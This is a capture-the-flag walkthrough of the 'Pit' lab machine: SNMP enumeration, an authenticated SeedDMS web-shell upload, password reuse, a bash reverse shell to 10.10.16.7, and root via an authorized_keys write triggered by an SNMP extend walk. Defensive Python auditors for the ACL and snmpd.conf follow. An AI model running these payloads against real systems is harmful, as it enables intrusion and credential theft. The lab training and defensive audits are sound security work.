Detailed walkthrough of the Pit machine. We will cover the following techniques:
- Information leakage
- SNMP Enumeration
- Abusing SeedDMS
- SNMP Code Execution
Reconnaissance.
Connectivity and TTL check.
We ping the target machine to confirm we get an ICMP response and to infer the operating system from the TTL:
ping -c 1 10.10.10.241
We have connectivity and the target is a Linux machine (a TTL of 63, i.e. 64 minus one hop, is typical of Linux).
Port scan.
We use nmap to scan every open port on the target:
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ # nmap -p- --open -sS --min-rate 5000 -n -Pn -vvv 10.10.10.241 -oG allPorts
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 21:53 CET
Initiating SYN Stealth Scan at 21:53
Scanning 10.10.10.241 [65535 ports]
Discovered open port 22/tcp on 10.10.10.241
Discovered open port 80/tcp on 10.10.10.241
Discovered open port 9090/tcp on 10.10.10.241
Completed SYN Stealth Scan at 21:54, 26.36s elapsed (65535 total ports)
Nmap scan report for 10.10.10.241
Host is up, received user-set (0.066s latency).
Scanned at 2022-02-10 21:53:41 CET for 26s
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (admin-prohibited)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
9090/tcp open zeus-admin syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.47 seconds
Raw packets sent: 131048 (5.766MB) | Rcvd: 35 (2.436KB)
My notes explain in more detail what each parameter of the command does.
Service scan on each open port.
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ #nmap -sCV -p22,80,9090 10.10.10.241 -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 21:55 CET
Nmap scan report for 10.10.10.241
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp open http nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
|_http-server-header: nginx/1.14.1
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Port | Service | Version |
---|---|---|
22 | ssh | OpenSSH 8.0 |
80 | http | nginx 1.14.1 |
9090 | ssl/zeus-admin? | - |
The scan reports the domain dms-pit.htb:
ssl-cert: Subject: commonName=dms-pit.htb/
Examining the SSL certificate.
We examine the HTTPS certificate served on port 9090:
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ #openssl s_client -connect 10.10.10.241:9090
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
verify return:1
---
Certificate chain
0 s:C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
i:C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, OU = ca-5763051739999573755, CN = dms-pit.htb
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
subject=C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
issuer=C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, OU = ca-5763051739999573755, CN = dms-pit.htb
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1750 bytes and written 363 bytes
Verification error: unable to verify the first certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 21 (unable to verify the first certificate)
---
closed
Here we can also see the domain dms-pit.htb. We add it to /etc/hosts and open the domain in the browser. The result is 403 Forbidden.
Scanning UDP ports.
Enumerating subdirectories turns up nothing, so we move on to the UDP ports:
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ #nmap -sU --top-ports 100 --open -v -n 10.10.10.241 -oG top100udp
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 22:46 CET
Initiating Ping Scan at 22:46
Scanning 10.10.10.241 [4 ports]
Completed Ping Scan at 22:46, 0.17s elapsed (1 total hosts)
Initiating UDP Scan at 22:46
Scanning 10.10.10.241 [100 ports]
Discovered open port 161/udp on 10.10.10.241
UDP Scan Timing: About 46.89% done; ETC: 22:47 (0:00:35 remaining)
Stats: 0:01:06 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 79.67% done; ETC: 22:47 (0:00:17 remaining)
Completed UDP Scan at 22:47, 101.27s elapsed (100 total ports)
Nmap scan report for 10.10.10.241
Host is up (0.081s latency).
Not shown: 99 filtered udp ports (admin-prohibited)
PORT STATE SERVICE
161/udp open snmp
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 101.56 seconds
Raw packets sent: 270 (16.691KB) | Rcvd: 109 (8.942
It reports the SNMP port (Simple Network Management Protocol), which will let us enumerate information about the machine.
Brute-forcing SNMP community strings.
We use a SecLists wordlist and the onesixtyone tool to brute-force the host and detect valid community strings.
┌─[✗]─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ #onesixtyone -c /usr/share/wordlists/SecLists/Discovery/SNMP/snmp.txt 10.10.10.241
Scanning 1 hosts, 3220 communities
10.10.10.241 [public] Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
10.10.10.241 [public] Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
public is a valid community string, so we can now use snmpwalk to view information about the machine. Before running snmpwalk we install snmp-mibs-downloader and edit /etc/snmp/snmp.conf, commenting out the line mibs : with a #; then we save and run snmpbulkwalk:
snmpbulkwalk -v2c -c public 10.10.10.241
We find nothing interesting. We try walking from the root of the tree by giving 1 as the OID:
snmpbulkwalk -v2c -c public 10.10.10.241 1
Now we do!
Going through everything it reports, we see the following:
- User: michelle
- Path: /var/www/html/seeddms51x/seeddms
We try that path on the domain https://dms-pit.htb and enter the user michelle with the password michelle. We're in!
Exploitation.
Looking for a vulnerability.
We search exploit-db.com for a vulnerability, using the searchsploit tool:
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit/exploits]
└──╼ #searchsploit seeddms
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
We view the following one:
searchsploit -x php/webapps/47022.txt
Exploiting the vulnerability.
These are the steps it gives:
Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
PHP Backdoor Code:
<?php
system($_REQUEST['cmd']);
?>
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
After following the steps above we have remote command execution. To run commands more comfortably we use the ttyoverhttp tool by s4vitar.
Remember: change the main_url variable to your document id and the name of your PHP file.
We find a configuration file with credentials at ../../conf/settings.xml:
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
We try the password ied^ieY6xoquu on the panel at http://pit.htb:9090 with the user michelle... We're in!
User flag.
There is a section that stands out, Terminal:
Access to the machine.
We send a bash shell back to our machine. We listen on port 443:
nc -nvlp 443
And we send the shell:
bash -c "bash -i >& /dev/tcp/10.10.16.7/443 0>&1"
We fix up the tty:
[michelle@pit ~]$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
[michelle@pit ~]$ ^Z
[1]+ Stopped nc -nvlp 443
w0lfst@h4cknet:~$ stty raw -echo; fg
nc -nvlp 443
reset xterm
[michelle@pit ~]$ export TERM=xterm
[michelle@pit ~]$ export SHELL=bash
[michelle@pit ~]$ stty rows X columns X
Privilege escalation.
Earlier we saw a script, /usr/bin/monitor, being executed. Let's see what it contains:
[michelle@pit ~]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
The script runs with bash every file in /usr/local/monitoring whose name starts with check and ends in sh. We go to /usr/local/monitoring but we have no permission to list the directory. Let's see which permissions are assigned to the folder:
[michelle@pit local]$ ls -la monitoring
total 0
drwxrwx---+ 2 root root 122 Feb 10 19:15 monitoring
We see a +, so it most likely has extended ACLs:
[michelle@pit local]$ getfacl monitoring/
# file: monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
The user michelle has write permission: user:michelle:-wx grants write and execute but not read, which is why we could not list the directory but can still create files inside it.
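The finding above is a configuration defect rather than a code bug: a directory whose contents a root job executes accepts writes from an unprivileged user. As an added example (not part of the original write-up), the following Python parses getfacl output in the text format shown above, applies the ACL mask to compute effective rights, and reports every non-owner principal that can write into the directory. The first sample is the getfacl output from the write-up; the hardened counterpart is constructed for comparison.

```python
"""Audit getfacl(1) output for a directory whose contents a privileged job executes.

Added example, not from the write-up. Effective rights for named users, the
owning group and named groups are entry & mask; the 'other' entry is not masked.
"""
import re
from dataclasses import dataclass

# getfacl output as shown in the write-up for /usr/local/monitoring
MONITORING_ACL = """\
# file: monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
"""

# Constructed hardened counterpart: only root may write; michelle may read the checks
HARDENED_ACL = """\
# file: monitoring/
# owner: root
# group: root
user::rwx
user:michelle:r-x
group::r-x
mask::r-x
other::---
"""


@dataclass(frozen=True)
class Finding:
    principal: str   # "user:michelle", "group:root" (owning group) or "other"
    effective: str   # effective permission string after the mask


def parse_acl(text):
    """Return (owner, group, entries); entries maps (tag, qualifier) -> 'rwx' string."""
    owner = group = None
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            m = re.match(r"#\s*(owner|group):\s*(\S+)", line)
            if m and m.group(1) == "owner":
                owner = m.group(2)
            elif m:
                group = m.group(2)
            continue
        tag, qualifier, perms = line.split(":", 2)
        entries[(tag, qualifier)] = perms
    return owner, group, entries


def apply_mask(perms, mask):
    """Each of r/w/x survives only if present in both the entry and the mask."""
    return "".join(p if p != "-" and p == m else "-" for p, m in zip(perms, mask))


def writable_non_owner(text):
    """List every principal other than the owning user with effective write permission."""
    _owner, group, entries = parse_acl(text)
    mask = entries.get(("mask", ""), "rwx")
    findings = []
    for (tag, qualifier), perms in entries.items():
        if tag == "mask" or (tag == "user" and qualifier == ""):
            continue  # the mask itself and the owning user are not findings
        effective = perms if tag == "other" else apply_mask(perms, mask)
        if "w" not in effective:
            continue
        if tag == "other":
            principal = "other"
        elif tag == "group" and qualifier == "":
            principal = f"group:{group}"
        else:
            principal = f"{tag}:{qualifier}"
        findings.append(Finding(principal, effective))
    return findings


if __name__ == "__main__":
    for label, acl in (("write-up", MONITORING_ACL), ("hardened", HARDENED_ACL)):
        print(label, [(f.principal, f.effective) for f in writable_non_owner(acl)])
```

Run against the write-up's ACL this reports user:michelle with -wx and the owning group root with rwx; the hardened variant reports nothing. The same check can be fed the output of `getfacl` on any directory that a root cron job or SNMP extend script reads from.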
Creating the script.
We create a new script:
vi checkw0lfst.sh
#!/bin/bash
echo 'tu-clave-publica' > /root/.ssh/authorized_keys
This copies our public key into root's authorized keys, so we can log in over ssh with our private key without needing a password.
To force /usr/bin/monitor to run (and with it every check*sh script in /usr/local/monitoring), we launch the following from our machine:
snmpwalk -v2c -c public 10.10.10.241 NET-SNMP-EXTEND-MIB::nsExtendObjects
And we connect over ssh:
ssh root@pit.htb
We read the flag and we're done!
Exploits and files: on my GitHub you will find the autopwn.py script and the reconnaissance files.
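Two server-side settings made the final step possible: a default read-only community string reachable over SNMPv2c, and an extend directive that makes snmpd run /usr/bin/monitor whenever NET-SNMP-EXTEND-MIB::nsExtendObjects is walked. As an added example (not from the write-up or from Net-SNMP itself), the following Python audits a Net-SNMP snmpd.conf for those two patterns. The two configuration samples are constructed; the `extend monitoring /usr/bin/monitor` line is an assumption about how the box was configured, inferred from the behaviour shown above. The directive names (rocommunity, rwcommunity, extend, exec, sh, createUser, rouser) are real Net-SNMP directives.

```python
"""Audit a Net-SNMP snmpd.conf for default community strings and command-running directives.

Added example, not from the write-up. Parses directives line by line and reports
(1) community strings that appear in common default wordlists or are not bound to a
source network and (2) extend/exec/sh directives, which make snmpd execute a command
when the corresponding MIB table is queried.
"""

# Constructed sample resembling the configuration implied by the write-up
WEAK_CONF = """\
rocommunity public
syslocation Server Room
# assumption: this is how the monitoring script was exposed over SNMP
extend monitoring /usr/bin/monitor
"""

# Constructed hardened counterpart: SNMPv3 user with auth+priv, no command directives
HARDENED_CONF = """\
createUser monitor SHA "placeholder-auth-pass" AES "placeholder-priv-pass"
rouser monitor priv
syslocation Server Room
"""

DEFAULT_COMMUNITIES = {"public", "private", "manager"}  # common entries in SNMP wordlists
COMMUNITY_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}


def parse_directives(text):
    """Yield (directive, args) pairs, ignoring comments and blank lines."""
    out = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        out.append((parts[0].lower(), parts[1:]))
    return out


def audit_snmpd_conf(text):
    """Return a list of human-readable findings for the given snmpd.conf text."""
    findings = []
    for name, args in parse_directives(text):
        if name in COMMUNITY_DIRECTIVES and args:
            community = args[0]
            access = "read-write" if name.startswith("rw") else "read-only"
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append(
                    f"{name}: default community '{community}' grants {access} access over SNMPv1/v2c"
                )
            if len(args) == 1:
                findings.append(
                    f"{name}: community '{community}' is not restricted to a source network"
                )
        elif name == "extend" and args:
            findings.append(
                f"extend: snmpd runs '{' '.join(args[1:])}' whenever "
                "NET-SNMP-EXTEND-MIB::nsExtendObjects is walked"
            )
        elif name in ("exec", "sh") and args:
            findings.append(
                f"{name}: snmpd runs '{' '.join(args)}' when UCD-SNMP-MIB::extTable is queried"
            )
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label)
        for finding in audit_snmpd_conf(conf):
            print("  -", finding)
```

The weak sample produces three findings (default community, unrestricted source, command execution via extend); the hardened sample produces none. A walk of nsExtendObjects against a host should also be visible in snmpd logs as a sign that someone is triggering extend scripts remotely.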